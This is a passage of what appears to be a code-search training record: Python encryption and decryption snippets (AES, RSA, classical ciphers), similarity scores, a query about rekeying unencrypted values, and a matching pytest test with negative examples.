print_round(round, 'm_col', matrix_to_text(state), verbose)\n\n add_round_key(state, w, round, Nb)\n print_round(round, 'k_sch', get_round_key(w, round, Nb), verbose)\n\n print_round(round, 'output', matrix_to_text(state), verbose)\n\n return matrix_to_text(state)", "def encrypt_message(self):\r\n\t\t#Will not let user input useless messages that cannot be encrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to encrypt. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\tself.setup_key_encrypt()\r\n\t\tmy_code = Encryptor(self.message, self.key)\r\n\t\tprint(my_code.transfer_encrypt()+ \"|\")", "def __encryptRSA(msg, key):\n # Convert message to bytes\n msg = msg.encode('utf-8')\n return key.encrypt(\n msg,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )", "def apply_old_re_enc(data=None, re_enc_info=None, debug=0):\n\n # Check if data is set\n if data is None:\n logging.error('apply_old_re_enc data exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in remove_re_enc data')\n raise Exception\n\n # Check if re_enc_info is set\n if re_enc_info is None:\n logging.error('apply_old_re_enc re_enc_info exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in apply_old_re_enc re_enc_info')\n raise Exception\n\n # Extract re-encryption parameters\n seed, key, iv, re_enc_length, init_val = get_re_enc_params(re_enc_info, debug)\n\n # Apply re-encryption\n return re_enc.re_encrypt(data, re_enc_length, seed, key, iv, init_val, 0)", "def encrypt(self, plaintext):\n\n # See comment in decrypt\n #\n if self.prev_crypto_op and self.prev_crypto_op != self.encrypt:\n raise RuntimeError('Same instance used for encrypt/decrypt')\n self.prev_crypto_op = self.encrypt\n\n return self.rc4.update(plaintext)", "def encrypt_key(data, key):\n data = MegaCrypto.base64_decode(data)\n return sum((MegaCrypto.str_to_a32(MegaCrypto.cbc_encrypt(data[_i:_i + 16], key))\n for _i in range(0, len(data), 16)), ())", "def encrypt_block(self, plaintext):\n assert len(plaintext) == 16\n plain_state = bytes2matrix(plaintext)\n\n add_round_key(plain_state, self._key_matrices[0])\n\n for i in range(1, self.n_rounds):\n sub_bytes(plain_state)\n shift_rows(plain_state)\n mix_columns(plain_state)\n add_round_key(plain_state, self._key_matrices[i])\n\n sub_bytes(plain_state)\n shift_rows(plain_state)\n add_round_key(plain_state, self._key_matrices[-1])\n\n return matrix2bytes(plain_state)", "def _encrypt_aes_key(aes_key: bytes, receiver_public_key: RsaKey) -> bytes:\n cipher_rsa = PKCS1_OAEP.new(receiver_public_key)\n return cipher_rsa.encrypt(aes_key)", "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def decipher(s, key): # s = message\n return decipher_raw(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def update(self, ciphertext):\n return self._decryptor.update(ciphertext)", "def _seal_message(self, message):\n encrypted_message = self.outgoing_handle.update(message)\n return encrypted_message", "def xorstr (key, msg):\n # join a list of chars into string where list is generated by \n # XORing each of msg bytes with each of the key bytes rotating.\n return ''.join([chr(ord(msg[i]) ^ ord(key[i % len(key)])) for i in range (0, len(msg))])", "def decryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n decoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code-key\n new = chr(change)\n string += new\n key += key_increment\n decoded = ''.join(string)\n return ('Decoded Message:\\t' + decoded)", "def _set_key(self, key):\n\n # select 56 bits from the 64-bit key\n key = self._permutate(self.__pc1, self._string_to_bitlist(key))\n self.L = key[:28]\n self.R = key[28:]\n for i in range(0, 16):\n for j in range(0, self.__left_rotations[i]):\n self.L.append(self.L[0])\n del self.L[0]\n self.R.append(self.R[0])\n del self.R[0]\n # select 48 bits from 56 bits\n self.Kn[i] = self._permutate(self.__pc2, self.L + self.R)", "def encrypt(text, key):\r\n\trail = [['\\n' for i in range(len(text))] for j in range(key)] \r\n\t\r\n\tdir_down = False\r\n\trow, col = 0, 0\r\n\t\r\n\tfor i in range(len(text)): \r\n\t\tif (row == 0) or (row == key - 1): \r\n\t\t\tdir_down = not dir_down \r\n\t\t\r\n\t\trail[row][col] = text[i] \r\n\t\tcol += 1\r\n\t\t\r\n\t\tif dir_down: \r\n\t\t\trow += 1\r\n\t\telse: \r\n\t\t\trow -= 1\r\n\t \r\n\tresult = [] \r\n\tfor i in range(key): \r\n\t\tfor j in range(len(text)): \r\n\t\t\tif rail[i][j] != '\\n': \r\n\t\t\t\tresult.append(rail[i][j]) \r\n\treturn(\"\" . join(result))", "def encrypt(self, input, key, iv):\n pass", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:\n ciphertext = \"\"\n # PUT YOUR CODE HERE\n\n key_lenght = len(keyword)\n text_lenght = len(plaintext)\n while key_lenght != text_lenght:\n keyword += keyword\n key_lenght = len(keyword)\n if key_lenght > text_lenght:\n keyword = keyword[:text_lenght]\n key_lenght = len(keyword)\n code_key = []\n ord_A = ord('A')\n ord_a = ord('a')\n\n if plaintext.islower():\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_a)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_a)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n ciphertext += \" \"\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_a\n ciphertext += chr(value)\n else:\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_A)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_A)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n value = ord(\" \")\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_A\n ciphertext += chr(value)\n return ciphertext", "def md5_encrypt(self, key):\n # instantiate the md5 object in hashlib module\n md5_object = hashlib.md5()\n # encrypt the key\n md5_object.update(key)\n # return the encrypted key\n encrypted_key = md5_object.hexdigest()\n return encrypted_key", "def aes_key_unwrap(self, kek: bytes, wrapped_key: bytes) -> bytes:\n return keywrap.aes_key_unwrap(kek, wrapped_key, default_backend())", "def encrypt(self):\n self.cipherText = self.cipherField.getText()\n # Set up the initial state of the encryption.\n if self.cipherText == \"\":\n self.matrixButton[\"state\"] = \"disabled\"\n self.plainText = self.plainField.getText()\n self.limit = len(self.plainText)\n if self.limit % 2 == 1:\n self.limit -= 1\n self.cursor = 0\n # Use the matrix to encrypt one pair of characters.\n if self.cursor < self.limit:\n self.cipherText += self.encryptPair()\n self.cipherField.setText(self.cipherText)\n self.cursor += 2\n # Add the last character if plaintext length was odd.\n elif self.limit < len(self.plainText):\n self.cipherText += self.plainText[self.limit]\n self.cipherField.setText(self.cipherText)\n # Clean up when done.\n if len(self.plainText) == len(self.cipherText):\n self.encryptButton[\"text\"] = \"Clear fields\"\n self.encryptButton[\"command\"] = self.clearFields", "def perform_aes_algorithm(plaintext, key):\n if len(key) == 32:\n print('C.1 AES-128 (Nk=4, Nr=10)\\n')\n elif len(key) == 48:\n print('\\nC.2 AES-192 (Nk=6, Nr=12)\\n')\n else:\n print('\\nC.3 AES-256 (Nk=8, Nr=14)\\n')\n\n print('{:<19} {:}'.format('PLAINTEXT:', plaintext))\n print('{:<19} {:}\\n'.format('KEY:', key))\n\n print('CIPHER (ENCRYPT):')\n ciphertext = encrypt(plaintext, key, verbose=True)\n\n print('\\nINVERSE CIPHER (DECRYPT):')\n decrypt(ciphertext, key, verbose=True)", "def encrypt(self, key, plaintext):\n output = []\n padded_key = padd_key(key, plaintext)\n for i in range(len(plaintext)):\n enc_ascii = (ord(plaintext[i]) + ord(padded_key[i])) % 256\n output.append(chr(enc_ascii))\n return ''.join(output)", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:", "def cipher(input_bytes, expanded_key, n_r):\n\n state = generate_initial_state(input_bytes)\n state = add_round_key(state, expanded_key, 0)\n\n # Apply rounds of operations as stated in AES standard\n for round_no in range(1, n_r):\n state = sub_bytes(state)\n state = shift_rows(state)\n state = mix_columns(state)\n state = add_round_key(state, expanded_key, round_no * 4 * 4)\n\n state = sub_bytes(state)\n state = shift_rows(state)\n state = add_round_key(state, expanded_key, n_r * 4 * 4)\n\n return state", "def unfunc(ciphertext, key):\n plaintext = xor(ciphertext, key)\n return plaintext", "def decrypt(key: str, encrypted: str) -> str:\n\n key_len = len(key)\n decrypted = ''\n\n # Go through the encrypted string in chunks the length of the key\n for i in range(0, len(encrypted), key_len):\n chunk = encrypted[i:i + key_len] # Pull out a chunk the size of the key\n\n # Apply the key to the chunk\n for j, c in enumerate(chunk):\n decrypted += chr(ord(key[j]) ^ ord(c))\n\n return decrypted", "def encipher(self):\n ciphertext = \"\"\n for pt, key_char in zip(self.text, self.key):\n char_index = self.char_block.alphabet.index(pt)\n ciphertext += self.char_block.rows[key_char][char_index]\n print(ciphertext)", "def expand_key(master_key):\n #s_box = bytes2matrix(s_box1)\n # Round constants https://en.wikipedia.org/wiki/AES_key_schedule#Round_constants\n r_con = (\n 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,\n 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,\n 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,\n 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,\n )\n\n # Initialize round keys with raw key material.\n key_columns = bytes2matrix(master_key, 4)\n #print(key_columns)\n iteration_size = len(master_key) // 4\n\n\n # Each iteration has exactly as many columns as the key material.\n columns_per_iteration = len(key_columns)\n i = 1\n while len(key_columns) < (N_ROUNDS + 1) * 4:\n # Copy previous word.\n word = list(key_columns[-1])\n\n # Perform schedule_core once every \"row\".\n if len(key_columns) % iteration_size == 0:\n # Circular shift.\n word.append(word.pop(0))\n # Map to S-BOX.\n word = [s_box[b-1] for b in word]\n\n # XOR with first byte of R-CON, since the others bytes of R-CON are 0.\n word[0] ^= r_con[i]\n i += 1\n elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:\n # Run word through S-box in the fourth iteration when using a\n # 256-bit key.\n word = [s_box[b] for b in word]\n\n # XOR with equivalent word from previous iteration.\n word = bytes(i^j for i, j in zip(word, key_columns[-iteration_size]))\n key_columns.append(word)\n\n # Group key words in 4x4 byte matrices.\n return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def keyExp(key):\r\n def sub2Nib(b):\r\n \"\"\"Swap each nibble and substitute it using sBox\"\"\"\r\n return sBox[b >> 4] + (sBox[b & 0x0f] << 4)\r\n \r\n Rcon1, Rcon2 = 0b10000000, 0b00110000\r\n w[0] = (key & 0xff00) >> 8\r\n w[1] = key & 0x00ff\r\n w[2] = w[0] ^ Rcon1 ^ sub2Nib(w[1])\r\n w[3] = w[2] ^ w[1]\r\n w[4] = w[2] ^ Rcon2 ^ sub2Nib(w[3])\r\n w[5] = w[4] ^ w[3]", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def encrypt(\r\n key: bytes,\r\n plain_text: str,\r\n) -> bytes:\r\n block_size = 16\r\n plain_text = _pad(plain_text, block_size)\r\n iv = os.urandom(block_size)\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n cipher_text = cipher.encrypt(plain_text.encode())\r\n return iv + cipher_text", "def decrypt():\n plaintext = \"\"\n i = 0\n while i < len(ciphertext):\n if i%2==1:\n try:\n plaintext += key[ ciphertext[i-1]+ciphertext[i] ]\n except KeyError:\n plaintext += ciphertext[i-1]+ciphertext[i]\n i += 1\n return plaintext", "def _rsa_chopstring(message, key, function):\r\n \r\n msglen = len(message)\r\n \r\n # the size of the key in bits, minus one\r\n # so if the key was a 1024 bits, key.size() returns 1023\r\n nbits = key.size() \r\n \r\n # JAC: subtract a byte because we're going to add an extra char on the front\r\n # to properly handle leading \\000 bytes and ensure no loss of information.\r\n nbytes = int(nbits / 8) - 1\r\n blocks = int(msglen / nbytes)\r\n \r\n if msglen % nbytes > 0:\r\n blocks += 1\r\n\r\n # cypher will contain the integers returned from either\r\n # sign or encrypt.\r\n cypher = []\r\n \r\n for bindex in range(blocks):\r\n offset = bindex * nbytes\r\n block = message[offset:offset+nbytes]\r\n # key.encrypt will return a bytestring\r\n # IMPORTANT: The block is padded with a '\\x01' to ensure\r\n # that no information is lost when the key transforms the block\r\n # into its long representation prior to encryption. It is striped\r\n # off in _rsa_gluechops.\r\n # IMPORTANT: both rsa_encrypt and rsa_sign which use _rsa_chopstring\r\n # will pass the argument 'function' a reference to encrypt or\r\n # sign from the baseclass publickey.publickey, they will return\r\n # the cypher as a tuple, with the first element being the desired\r\n # integer result. \r\n # Example result : ( 1023422341232124123212 , )\r\n # IMPORTANT: the second arguement to function is ignored\r\n # by PyCrypto but required for different algorithms.\r\n cypher.append( function(chr(1) + block, '0')[0])\r\n\r\n return _rsa_picklechops(cypher)", "def on_encryptionKeyAgainEdit_textChanged(self, txt):\n self.__updateUI()", "def aes_decrypt(encrypted_data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = cipher.decrypt(encrypted_data)\r\n return unpad(padded_data)", "def test_encryption(e, c):\n message = input(\"Enter word to encrypt: \")\n ciphered = ''\n\n for i in range(0, len(message)):\n ciphered = f'{ciphered}{chr(endecrypt(ord(message[i]), e, c))}'\n\n print(ciphered + ' is the ciphered text')\n d = key_cracker(e, c)\n print(\"Plain text is:\")\n for i in range(0, len(ciphered)):\n print(chr(endecrypt(ord(ciphered[i]), d, c)), end='')", "def text(message):\n room = session.get('room')\n key = os.urandom(32)\n iv = os.urandom(16)\n print(key,iv)\n\n print(key[:2],key[:4])\n print(len(key),len(iv))\n print(type(key))\n data = 'hello world 1234' # <- 16 bytes\n\n enc = aes_encrypt(key,data,iv)\n dec = aes_decrypt(key,enc,iv)\n\n print('data:',data)\n print('cipher:', enc)\n print('plain:',dec)\n test = os.urandom(2)\n print('key:', int.from_bytes(test, byteorder='little'))\n print('key', test)\n \n emit('enc_msg', {'key': key.hex(),\n 'cipher': enc.hex(),\n 'iv' : iv.hex(),\n }, room=room)\n emit('message', {'msg': session.get('name') + ':' + message['msg']}, room=room)", "def repeating_key_xor(msg_b, key_b):\n l = len(key_b)\n return bytes(key_b[n % l] ^ c_i for n, c_i in enumerate(msg_b))", "def test_kms_re_encrypt_call(self):\n b64_secret = base64.b64encode(self.secret)\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, b64_secret)\n self.mock_kms.re_encrypt_called_once_with(CiphertextBlob=b64_secret)", "def _encrypt(self):\n self._outfile = os.path.join(self.dest, self.encrypted_file)\n self._infile = self.plain_file\n self._log.info(\"Encrypting '%s' to '%s'\", self.plain_file, self._outfile)\n with open(self.plain_file, \"rb\") as plain_file:\n openssl(\n \"enc\",\n \"-aes-256-cbc\",\n \"-pass\",\n \"file:{secret}\".format(secret=self.secret.keyfile),\n _in=plain_file,\n _out=self._outfile,\n )\n self._log.info(\"File '%s' encrypted to '%s'\", self.plain_file, self._outfile)\n return True", "def update_cipher(self, input):\n\n if self.cipher is None:\n \"\"\" We directly put the input in the lsfr\n Generally, at the beginning, the input correspond\n to the xoring of the uid, key and nonce Nt \"\"\"\n self.cipher = input\n else:\n \"\"\" We update the state of the lfsr by\n xoring the lfsr with the input. For the moment,\n the feedback bits generated from g(x) are \n not taken in account. But it should be at the \n initialization step only ... \"\"\" \n self.cipher = self.cipher ^ input", "def encrypt_aes(msg, key, iv):\r\n #start timer\r\n start = timeit.default_timer()\r\n\r\n #converting key to bytes from hex\r\n key = bytes.fromhex(key)\r\n msg = pad(msg)\r\n obj = AES.new(key, AES.MODE_CBC, iv)\r\n ciphertxt = obj.encrypt(msg)#ciphertxt will be in 'bytes'\r\n\r\n #converting ciphertxt into hexadecimal\r\n ciphertxt = ciphertxt.hex()\r\n\r\n print(\"Ciper is: \",ciphertxt)\r\n\r\n #stop timer\r\n stop = timeit.default_timer()\r\n print('Encryption Running Time: ', stop-start)\r\n \r\n return ciphertxt", "def encrypt(self, message):\n # message = message.upper().split()\n # message = \"\".join(message)\n message = message.upper()\n message_list = []\n for ch in message:\n message_list.append(self.main_dict[ch][0])\n\n # Generate a random key\n random_otp = [random.choice(self.alphabet_list) for _ in range(len(message))]\n print(\"Your OTP is: \" + str(\"\".join(random_otp)))\n print(\"Use the OTP to unlock the message.\")\n\n # Convert Random key to integers\n for i, item in enumerate(random_otp):\n random_otp[i] = self.main_dict[item][0]\n\n # Do the math with Random Key and the message\n math_list = []\n for i, item in enumerate(message_list):\n try:\n result = message_list[i] + random_otp[i]\n math_list.append(result)\n except:\n print(\"The message and OTP does not have the same length\")\n continue\n\n # Logic to do mod27\n for i, item in enumerate(math_list):\n for key, value in self.main_dict.items():\n if item > 26:\n if value[1] == item:\n math_list[i] = key\n else:\n if value[0] == item:\n math_list[i] = key\n\n # Algorithm for 5 block characters\n padding = input(\"Would you like to use block 5 characters? y/n \")\n if padding == \"y\":\n math_list = self.salt_with_random(math_list)\n return \" \".join(math_list)\n else:\n math_list = \"\".join(math_list)\n return math_list", "def encrypt(input_bytes, expanded_key, n_r):\n\n # Add ZeroLength padding if necessary\n pad = 16 - (len(input_bytes) % 16)\n input_bytes.extend([0] * pad)\n input_bytes[-1] = pad\n\n # Encrypt each block of input plaintext\n output_bytes = []\n for i in range(0, len(input_bytes), 16):\n # Cipher block of 16 bytes\n partial = cipher(input_bytes[i:i+16], expanded_key, n_r)\n\n # Re-group bytes in column-first order\n for col in range(0, 4):\n for row in range(0, 4):\n output_bytes.append(partial[row][col])\n\n return output_bytes", "def decipher2(s, key): # s = message\n return decipher_raw2(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def revert(self, record, new_password):\n if self.old_key_deleted:\n if self.aws_sync_profile:\n if self.sync_with_creds_file():\n logging.info(\n f'New key id \"{self.new_key_id}\" was updated in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, but failed to update in Keeper record.'\n )\n else:\n logging.info(\n f'New key id {self.new_key_id} failed to update in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, and also failed to update in Keeper record.'\n )\n return False\n else:\n self.delete_key(new_key=True)", "def encrypt(content, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\t\tfrom Cryptodome import Random\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\t\tfrom Crypto import Random\n\n\tif not isPython2():\n\t\tif isString(content):\n\t\t\tcontent = content.encode(\"latin-1\")\n\t\tif isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\n\tcontent = pad(content)\n\tiv = Random.new().read(AES.block_size)\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tresult = iv + cipher.encrypt(content)\n\treturn result", "def rail_fence_encrypt(string, key):\n try:\n cols_size = len(string)\n arr_of_words = [[0 for i in range(cols_size)] for j in range(key)]\n pos = 0\n direction = 1\n for j in range(0, cols_size):\n # direction variable sets the moving direction\n arr_of_words[pos][j] = string[j]\n pos += direction\n if pos == 0 or pos == key-1:\n direction *= (-1)\n\n str_to_return = \"\" # concat the new string\n for i in range(key):\n for j in range(cols_size):\n if arr_of_words[i][j] != 0:\n str_to_return += arr_of_words[i][j]\n return str_to_return\n except (ValueError, IndexError) as ex:\n print(EXCEPTION_MESSAGE, ex)", "def encrypt():\n\tnull = 0", "def encipher(self,string): \n string = self.remove_punctuation(string)\n ret = ''\n for (i,c) in enumerate(string):\n if i<len(self.key): offset = self.a2i(self.key[i])\n else: offset = self.a2i(string[i-len(self.key)]) \n ret += self.i2a(self.a2i(c)+offset)\n return ret", "def aes_ctr_encrypt(self, key: bytes, plain_data: bytes, nonce: bytes) -> bytes:\n cipher = Cipher(algorithms.AES(key), modes.CTR(nonce), default_backend())\n enc = cipher.encryptor()\n return enc.update(plain_data) + enc.finalize()", "def xor_decrypt(ciphertext, key):\n\n\tdecrypted_char = ''\n\tdecrypted_str = ''\n\n\tfor char in ciphertext:\n\t\tdecrypted_char = chr(char ^ key)\n\t\tdecrypted_str += decrypted_char\n\n\treturn decrypted_str", "def aes_key_wrap(self, kek: bytes, key_to_wrap: bytes) -> bytes:\n return keywrap.aes_key_wrap(kek, key_to_wrap, default_backend())", "def encrypt_message(message,public_key,symetric_key):\n\tif message != None:\n\t\tnonce = os.urandom(12)\n\t\tmessage = AESCCM(symetric_key).encrypt(nonce,message.encode(\"iso-8859-1\"),None)\n\t\tnonce, *_ = encrypt(public_key,nonce)\n\t\tmessage ={'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\n\treturn message", "def generate_encrypted_key(key, encryption_key):\n pub_enc_key = RSA.importKey(encryption_key)\n # RSA encryption protocol according to PKCS#1 OAEP\n cipher = PKCS1_OAEP.new(pub_enc_key)\n return cipher.encrypt(key)", "def encrypt(self, message):\n\n IV = Random.new().read(self.BLOCK_SIZE)\n aes = AES.new(self.key, AES.MODE_CBC, IV)\n return base64.b64encode(IV + aes.encrypt(self._pad(message)))", "def encrypt(self, plaintext):\n return self._transform(plaintext, self._forward)" ]
[ "0.7298857", "0.7298796", "0.71268785", "0.66500294", "0.6324676", "0.62568414", "0.6190534", "0.6128457", "0.61111814", "0.6098401", "0.60541093", "0.59321904", "0.5931756", "0.5884302", "0.587639", "0.58716655", "0.5832455", "0.58202076", "0.5819175", "0.5817855", "0.58072025", "0.5782812", "0.5781394", "0.57752514", "0.5763925", "0.57580334", "0.5740395", "0.5723917", "0.56983775", "0.5694362", "0.56916404", "0.5686319", "0.56828284", "0.5624081", "0.56213146", "0.56144273", "0.56143916", "0.561135", "0.5594446", "0.5589564", "0.5575889", "0.5571132", "0.5553264", "0.5542429", "0.5533341", "0.5506831", "0.54948634", "0.54858255", "0.5485778", "0.54724866", "0.54638803", "0.5452072", "0.5444379", "0.54362196", "0.5435763", "0.54349726", "0.54295075", "0.5421083", "0.54138976", "0.5411106", "0.5398004", "0.53975874", "0.53947574", "0.53947145", "0.53823197", "0.5380209", "0.5374385", "0.5373131", "0.53637534", "0.5356349", "0.53516275", "0.5345637", "0.5332534", "0.5322125", "0.5310796", "0.5310576", "0.52931243", "0.52910525", "0.5290315", "0.5289933", "0.5289342", "0.5288645", "0.5283779", "0.52828836", "0.52754337", "0.52702767", "0.5270133", "0.5270133", "0.5261072", "0.5260378", "0.52579516", "0.5256385", "0.52563167", "0.525532", "0.523766", "0.5235122", "0.5222716", "0.5221709", "0.522149", "0.5218166" ]
0.7975824
0
It raises an error when trying to rekey a nonencrypted value.
def test_rekey_non_encrypted(self): with pytest.raises(EncryptionError): rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def test_invalid_keys(self):\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"this has spaces\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with spaces did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"\\x10control\\x02characters\\x11\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with control characters did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"a\" * (SERVER_MAX_KEY_LENGTH + 1), 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"long key did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(u\"unicode\\u4f1a\", 1)\n\t\texcept TypeError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"unicode key did not raise ValueError\")", "def testKeyMismatch(self):\n encrypted_data = self.encrypt_wrapper.read(1024 * 1024 * 100)\n\n wrong_key = crypto.RSAPrivateKey().GenerateKey()\n decrypt_wrapper = uploads.DecryptStream(\n readers_private_key=self.readers_private_key,\n writers_public_key=wrong_key.GetPublicKey(),\n outfd=self.outfd)\n\n # We should know after very few bytes that the key is wrong. The\n # first encrypted chunk is the serialized signature which is 518\n # bytes in the test. Adding crypto headers gives a chunk size of\n # 570. After 600 bytes we should definitely bail out.\n with self.assertRaises(crypto.VerificationError):\n decrypt_wrapper.write(encrypted_data[:600])", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def test_wrong_key(self):\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro(\"\")\n assert FinderInsideProException.EXCEPTION_TEXT_KEY_NOT_SET in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG\n\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro('aaa')\n assert FinderInsideProException.EXCEPTION_TEXT_WRONG_KEY in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def test_kms_re_encrypt_fails_client_error(self):\n self.mock_kms.re_encrypt.side_effect = self.client_error\n b64_secret = base64.b64encode(self.secret)\n with self.assertRaises(SystemExit):\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, b64_secret)", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def gpgkey_error(self, repo_id, error):\n self.send(repo_id, 'gpgkey_error', error)", "def test_kms_re_encrypt_fails_without_b64_secret(self):\n with self.assertRaises(SystemExit):\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, self.secret)", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def test03Expire(self):\n s = utils.FastStore(max_size=100)\n key = \"test1\"\n s.Put(key, 1)\n\n # This should not raise\n self.assertEqual(s.Get(key), 1)\n s.ExpireObject(key)\n\n self.assertRaises(KeyError, s.Get, key)", "def test_encrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = None\n\n with pytest.raises(EncryptionError):\n encrypt('message')", "def test_decrypt_format(self):\n with pytest.raises(EncryptionError):\n decrypt('message')", "def keychange(self):\n # if response.json()['error']['errors'][0]['reason']=='quotaExceeded':\n self.keyindex += 1\n if self.keyindex == len(self.keylist):\n self.keyindex = 0\n print('Keylist length reached')\n print('Changinf Key..')\n key = self.keylist[self.keyindex]\n print(\"Quota Exceeded\", self.keyindex)\n return key", "def _check_key(self, key):\n raise NotImplementedError", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def validate_key_throw(*args):\n validation_result = validate_key(*args)\n if not validation_result:\n raise ValueError(str(validation_result))\n return validation_result", "def test_set_redis_no_val():\n with pytest.raises(TypeError):\n redis_data.set_redis_data('key')", "def test_wrong_course_key(self):\n def mock_from_string(*args, **kwargs):\n 